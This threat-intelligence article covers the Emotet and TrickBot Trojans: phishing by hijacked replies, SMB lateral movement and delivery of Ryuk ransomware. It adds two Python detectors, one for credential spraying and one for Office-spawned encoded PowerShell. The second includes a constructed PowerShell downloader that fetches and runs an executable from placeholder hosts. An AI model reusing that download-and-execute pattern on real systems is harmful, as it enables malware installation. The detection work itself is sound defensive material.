The Emotet and TrickBot banking Trojans are among the most prominent threats of 2019. A report released by security firm CrowdStrike found that the Emotet and TrickBot malware strains were the most prevalent in the first half of 2019; it also identified other top threats this year, among them Dridex, Gozi, and cryptocurrency-mining malware. Emotet in particular has advanced continuously since it first appeared in 2014. It was originally created as a banking Trojan but has evolved over the years into a loader that runs a large-scale botnet and delivers other malware in untargeted campaigns.
In July 2018 the US Department of Homeland Security issued an alert describing the malware as among “the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors”. Researchers at various security firms have since documented successive upgrades to the Trojan: it can steal user credentials, evade security defenses, and take instructions from its command-and-control servers on any system it has infected. A study published by the security firm Sophos rated Emotet as worse than WannaCry, attributing this to the frequent updates that make it difficult to contain.
Brad Duncan, a threat intelligence analyst at Palo Alto Networks, observed in January 2019 that Emotet is among the most prevalent malware campaigns, with new infection vectors identified every day. It has repeatedly been used to distribute other malware families; Duncan said he had “seen Emotet retrieve Gootkit and the IcedID banking Trojan”. Mealybug, the group behind Emotet, has actively used it to distribute additional malicious programs such as Ryuk ransomware. Emotet was, for instance, blamed for the cyber-attack on the Onslow Water and Sewerage Authority (ONWASA) in Jacksonville, North Carolina.
Although ONWASA's IT security staff initially believed they had removed the Trojan, it proved persistent: it had been timed to drop Ryuk ransomware at exactly 3 a.m. on 13 October. Staff on duty witnessed the attack but could not contain it as it spread quickly through the network, encrypting databases and files. In a separate incident, Duncan found Emotet being delivered as the payload of a Microsoft Word document: if the recipient enabled the document's macros, they executed, and the resulting Emotet infection went on to download the IcedID banking Trojan.
Today’s Emotet is more advanced. It spreads primarily through spam, using phishing emails that carry infected documents. Unlike typical phishing, in which an attacker sends a batch of emails to strangers, Emotet picks out messages in an infected mailbox that have not yet been answered and sends its malicious document as a reply to them, so the attachment arrives inside a conversation the recipient already recognizes. The recipient opens the document and is infected; the strategy has a high success rate. Once Emotet is on a system, a 2019 Malwarebytes report indicates that it exploits the EternalBlue vulnerability on hosts still running SMBv1. The report stated that “Infected machines attempt to spread Emotet laterally via brute force of domain credentials, as well as externally via its built-in spam module”, and as a result Emotet is “quite active and responsible for much of the malspam we encounter”.
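The lateral-movement behaviour quoted above, an infected host brute-forcing domain credentials over the network, leaves a recognizable trace in Windows Security logs: one source address producing logon failures (Event ID 4625, network logon type 3) against many different accounts in a short time, sometimes followed by a success (4624). The detector below is an added example written for this article, not code from Malwarebytes or from Emotet itself; the events it runs over are constructed, the field names follow the 4624/4625 event schema, and the 120-second window and ten-account threshold are assumptions to tune to your environment.

```python
"""Flag a host spraying domain credentials over the network, the lateral-movement
behaviour the Malwarebytes report describes.  Added example with constructed events."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect(events, window_seconds=120, threshold=10):
    """Single pass over time-ordered events.  Per source address, remember recent
    network-logon failures (4625, logon type 3); alert once when a source has failed
    against `threshold` distinct accounts inside the window, and again whenever that
    source later logs on successfully (4624), which suggests a password was guessed."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # source -> deque of (time, account) failures in window
    sprayers = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["LogonType"] != 3:
            continue              # SMB authentication shows up as network logons
        src, acct, t = ev["IpAddress"], ev["TargetUserName"].lower(), ev["time"]
        if ev["EventID"] == 4625:
            q = recent[src]
            q.append((t, acct))
            while q and t - q[0][0] > window:
                q.popleft()       # drop failures that fell out of the window
            accounts = {a for _, a in q}
            if len(accounts) >= threshold and src not in sprayers:
                sprayers.add(src)
                alerts.append({"type": "credential_spray", "source": src,
                               "accounts": len(accounts), "time": t})
        elif ev["EventID"] == 4624 and src in sprayers:
            alerts.append({"type": "success_after_spray", "source": src,
                           "account": acct, "time": t})
    return alerts


def build_sample_events():
    """Constructed, simplified Security-log events.  Field names follow the 4624/4625
    event schema; every value here is made up for the example."""
    base = datetime(2019, 6, 3, 9, 0, 0)
    events = []
    # An infected workstation at 10.0.20.15 works its password list against twelve
    # domain accounts, one every five seconds ...
    for i in range(12):
        events.append({"time": base + timedelta(seconds=5 * i), "EventID": 4625,
                       "LogonType": 3, "IpAddress": "10.0.20.15",
                       "TargetUserName": f"user{i:02d}"})
    # ... and eventually guesses a service account's password.
    events.append({"time": base + timedelta(seconds=70), "EventID": 4624,
                   "LogonType": 3, "IpAddress": "10.0.20.15",
                   "TargetUserName": "svc_backup"})
    # Meanwhile a person on 10.0.30.7 mistypes their own password twice, then gets in:
    # a single account, so no spray alert.
    for i in range(2):
        events.append({"time": base + timedelta(seconds=30 + 7 * i), "EventID": 4625,
                       "LogonType": 3, "IpAddress": "10.0.30.7",
                       "TargetUserName": "jsmith"})
    events.append({"time": base + timedelta(seconds=50), "EventID": 4624,
                   "LogonType": 3, "IpAddress": "10.0.30.7", "TargetUserName": "jsmith"})
    return events


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert)
```

Counting distinct accounts rather than raw failures is what separates a spreader walking a password list from a user who mistypes a password a few times; the success-after-spray alert is the one worth paging on, because it names the account whose password was guessed.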
Emotet has also been reported to have harvested millions of email messages. A report by Kryptos Logic indicated that Emotet was exfiltrating emails, extending its use to cyber espionage; Kryptos Logic also reported that an Emotet infection gave the attackers access to messages going back more than three months. It has these abilities because it is modular: once it has infected a system it downloads several small modules, among them an SMB-based spreader that lets it move laterally through a network, wreaking havoc as it goes. This was demonstrated in the Emotet attack on Allentown, Pennsylvania, where the malware spread across all of the city’s networks and downloaded additional malware onto the infected systems. The municipality ended up rebuilding its entire infrastructure at a cost of about $1 million.
Emotet has also been described as capable of shutting down a hospital, according to the California-based cybersecurity firm Proofpoint. The malware, originally built to worm through a bank’s files, has “become the biggest malware payload sent to healthcare companies”, Proofpoint noted on 27 October 2019. According to Proofpoint, the Trojan first showed up in the first quarter of the year as a botnet targeting health institutions in the US. In recent months Proofpoint had observed Emotet volume drop, and it attributes the hiatus to the attackers retooling the Trojan with additional capabilities. Emotet is thus a prime example of the multipurpose malware families targeting the healthcare industry, Proofpoint concluded.
In addition, security researchers at Cybereason have dubbed a campaign that uses Emotet and TrickBot as the delivery chain for Ryuk ransomware a “triple threat”. The researchers noted that the campaigns targeted firms based in the US. The attack starts with a phishing email carrying a malicious Microsoft Word document. When the user opens the document, it executes a PowerShell command that connects to several malicious domains in turn and attempts to download the Emotet payload from them.
Cybereason’s researchers further explained that the payload executes, infects the machine, and begins gathering sensitive information. The second phase of the attack downloads and executes the TrickBot Trojan by communicating with a remote host. TrickBot infects the system and steals sensitive data such as administrator credentials. Both the Emotet and TrickBot modules evade detection by injecting themselves into legitimate processes. In the final phases the attackers move laterally through the network and connect to other systems before deploying Ryuk. Emotet has established itself as one of the most damaging malware families, and businesses should understand how to prevent it.
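The first stage of the chain described in the two paragraphs above, a Word document spawning a PowerShell command that tries a list of download locations, is where endpoint telemetry gives defenders the clearest signal: an Office process as the parent of powershell.exe, an encoded command, and several URLs inside it. The detector below is an added example written for this article, not code from Cybereason or from the campaign itself. It shows how `-EncodedCommand` arguments are built (base64 over UTF-16LE) so they can be decoded back, and it runs over constructed process-creation events; the downloader script and its example.com/example.net hosts are made up, and the heuristics (Office parent, encoded command carrying two or more URLs) are assumptions, not a published rule.

```python
"""Spot an Emotet-style maldoc -> PowerShell downloader chain in process-creation
events.  Added example; the events below are constructed, not real telemetry."""
import base64
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# A URL ends at whitespace or at the quote/delimiter characters a PowerShell
# string literal or array would put around it.
URL_RE = re.compile(r'''https?://[^\s'"`;,)\]]+''', re.IGNORECASE)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)


def encode_command(script: str) -> str:
    """What PowerShell expects after -EncodedCommand: base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(token: str):
    """Inverse of encode_command; None when the token is not a valid encoded command."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_encoded(cmdline: str):
    """Return the argument following an -EncodedCommand switch, or None.
    powershell.exe accepts any unambiguous prefix of the switch name (-e, -en, -enc, ...)
    and the documented alias -ec, so match on the prefix rather than the full name."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/"):
            name = tok[1:].lower()
            if name == "ec" or (name and "encodedcommand".startswith(name)):
                return tokens[i + 1]
    return None


def analyze(event: dict) -> dict:
    """Verdict for one process-creation event (parent image, child image, command line)."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    reasons, urls, decoded, enc = [], [], None, None
    if image in POWERSHELL:
        cmd = event["cmdline"]
        if parent in OFFICE_APPS:
            reasons.append(f"{parent} spawned {image}")   # the maldoc macro stage
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden window requested")
        enc = extract_encoded(cmd)
        if enc is not None:
            decoded = decode_command(enc)
            reasons.append("encoded command" + ("" if decoded else " (undecodable)"))
        # Look for URLs in the decoded script when we have one, else in the raw line.
        urls = URL_RE.findall(decoded if decoded else cmd)
        if len(urls) >= 2:
            reasons.append(f"{len(urls)} download URLs tried in turn")
    # Office -> PowerShell is suspicious on its own; so is an encoded command that
    # carries a list of download locations, whatever the parent process is.
    suspicious = (parent in OFFICE_APPS and image in POWERSHELL) or (enc is not None and len(urls) >= 2)
    return {"suspicious": suspicious, "reasons": reasons, "urls": urls, "decoded": decoded}


# Constructed downloader in the shape the text describes: several download locations,
# each tried until one succeeds.  Hosts are reserved example domains, not real C2.
SAMPLE_SCRIPT = (
    "$u='http://a.example.com/wp-content/Xy1/','http://b.example.net/cgi-bin/Q7/';"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,$env:TEMP+'\\541.exe');"
    "Start-Process ($env:TEMP+'\\541.exe');break}catch{}}"
)

SAMPLE_EVENTS = [
    {   # Word document macro launching an encoded, hidden PowerShell downloader
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT),
    },
    {   # Benign: an administrator's script started from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
]


def run_samples():
    return [analyze(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for v in run_samples():
        print(v["suspicious"], v["reasons"], v["urls"])
```

Decoding the command rather than matching on the raw line matters: the URL list, the temp-file drop path, and the try/catch fallback loop are all invisible in the base64 blob that the process-creation event records, and those are the indicators worth extracting for blocking and hunting.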